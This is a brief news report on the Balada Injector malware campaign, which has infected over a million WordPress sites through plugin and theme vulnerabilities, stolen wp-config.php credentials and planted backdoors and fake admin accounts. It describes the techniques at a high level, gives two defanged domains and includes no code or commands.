A malicious campaign goes by the name Balada Injector has infected over one million WordPress websites have been infected over years.
As per the researchers, the campaign exploits all known and recently discovered theme and plugin vulnerabilities to inject a Linux backdoor on WordPress sites. This method allowed for various levels of access, and in many cases, the vulnerabilities exploited allowed an attacker to obtain critical information on the compromised websites.
Since 2017, the campaign has continuously ranked in the top three of infections that’s been detected and cleaned from affected sites. The campaign initiates fresh waves of attacks using newly registered domains and variations of previously-used malware. The most recent wave of attacks was observed where the campaign exploited a high-severity vulnerability in WordPress’s Elementor Pro, a plugin used by 11 million websites.
Researchers says that this campaign is easily identified by its preference for String.fromCharCode obfuscation, the use of newly-registered domain names hosting malicious scripts on random subdomains, and by redirects to various scam sites, including fake tech support, fraudulent lottery wins, and push notifications scams.
The threat actors use the period between each wave to develop new attack routines, usually by gathering and testing new vulnerabilities. Each wave uses a new, freshly registered domain name that combine random English words together, such as sometimesfree[.]biz, and destinyfernandi[.]com.
Balada Injector has used over a hundred different domain names and leveraged a wide range of attack methods, including site url hacks, HTML injections, database injections, and arbitrary file injections, with attacks often involving multiple infections on the same site
Balada’s scripts aim to steal database credentials in wp-config.php files, something that could allow continued access even if the site owner patches previously exploited vulnerabilities and removes the backdoor files. To evade detection, the attackers frequently altered the list of targeted files, adding “new elements” while removing “underperforming ones.” If the site is not compromised yet, they[the attackers] use various tricks to obtain contents of wp-config.php. And if it’s already compromised, they read it to save the credentials for future uses.
The campaign attempts to gain access to arbitrary site files, including backup archives, databases, access logs, debug info, while hunting for tools like Adminer and phpMyAdmin. The malware eventually led to the generation of fake WordPress admin users, stealing data from underlying hosts and leaving backdoors for continued access.
This research was documented by researchers from Succuri